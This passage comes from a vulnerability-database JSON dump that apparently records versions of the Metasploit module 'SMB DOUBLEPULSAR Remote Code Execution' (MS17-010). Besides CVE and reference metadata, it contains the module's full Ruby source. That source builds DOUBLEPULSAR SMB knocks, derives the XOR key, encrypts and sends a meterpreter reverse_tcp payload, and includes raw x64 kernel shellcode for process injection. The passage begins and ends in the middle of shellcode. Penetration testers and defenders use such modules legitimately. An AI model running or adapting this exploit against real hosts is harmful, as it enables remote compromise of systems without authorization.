\"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\n 
\"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\n end\n\n def kernel_shellcode_size\n make_kernel_shellcode('').length\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 101}, "differentElements": ["published", "modified"], "edition": 58, "lastseen": "2020-06-23T07:32:07"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. 
While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-06-20T22:39:19", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", 
"CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", 
"SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-06-20T22:39:19", "rev": 2, "value": 6.8, "vector": "NONE"}}, "hash": "b5c27edf64ad9e8cc92bd99d726f1c80", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-06-20T22:39:19", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:19:20", "objectVersion": "1.4", "published": "2020-01-29T19:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/smb/smb_doublepulsar_rce.rb", "title": "SMB DOUBLEPULSAR Remote Code Execution", "type": "metasploit", "viewCount": 96}, "differentElements": ["sourceData"], "edition": 56, "lastseen": 
"2020-06-20T22:39:19"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.\n", "enchantments": {"dependencies": {"modified": "2020-03-28T22:11:20", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": 
["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2"], "type": "avleonov"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": 
["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0146", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"modified": "2020-03-28T22:11:20", "value": 7.8, "vector": "NONE"}}, "hash": "87ca22fd843673ff2ae5372d0047960d", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "lastseen": "2020-03-28T22:11:20", "metasploitHistory": "", "metasploitReliability": "", "modified": "2020-02-03T17:19:20", "objectVersion": "1.4", "published": "2020-01-29T19:00:00", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/", "https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1", "https://github.com/countercept/doublepulsar-detection-script", "https://github.com/countercept/doublepulsar-c2-traffic-decryptor", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", 
"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 
'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? 
ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 
'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n 
return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = param.length\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\n pkt['Payload'].v['ParamCountMax'] = 1\n pkt['Payload'].v['DataCountMax'] = 0\n pkt['Payload'].v['ParamCount'] = param.length\n pkt['Payload'].v['ParamOffset'] = param_offset\n pkt['Payload'].v['DataCount'] = body.to_s.length\n pkt['Payload'].v['DataOffset'] = data_offset\n pkt['Payload'].v['SetupCount'] = setup_count\n pkt['Payload'].v['SetupData'] = setup_data\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\n pkt['Payload'].v['Payload'] = data\n\n pkt.to_s\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n def make_kernel_user_payload(ring3, proc_name)\n sc = make_kernel_shellcode(proc_name)\n\n sc << [ring3.length].pack('S<')\n sc << ring3\n\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from 
external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 780 bytes\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\n generate_process_hash(proc_name.upcase) +\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\n 